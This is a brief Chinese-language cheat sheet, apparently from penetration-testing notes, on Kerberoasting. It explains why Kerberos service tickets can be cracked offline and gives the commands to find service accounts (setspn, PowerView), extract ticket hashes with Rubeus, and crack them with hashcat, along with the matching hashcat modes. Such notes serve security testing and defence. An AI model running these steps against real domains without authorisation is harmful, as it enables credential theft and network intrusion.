kerberoasting

攻击原理

在第二部分中的TGS是server hash加密的，可以爆破服务账户的hash，而任何有效的域用户都可以请求任何域服务的 kerberos 票证 （ST）

利用

• 发现spn

setspn -Q */*

或者powerivew
Get-NetUser -SPN

• 直接执行Rubeus获取hash

.\Rubeus.exe kerberoast /user:fileserver /nowrap

• 到hashcat破解

hashcat.exe -m 13100 spnhash.txt pwd.txt --force

注意：

hashcat要使用正确的模式破解

模式	描述
13100	Kerberos 5 TGS-REP etype 23 （RC4）
19600	Kerberos 5 TGS-REP etype 17 （AES128-CTS-HMAC-SHA1-96）
19700	Kerberos 5 TGS-REP etype 18 （AES256-CTS-HMAC-SHA1-96）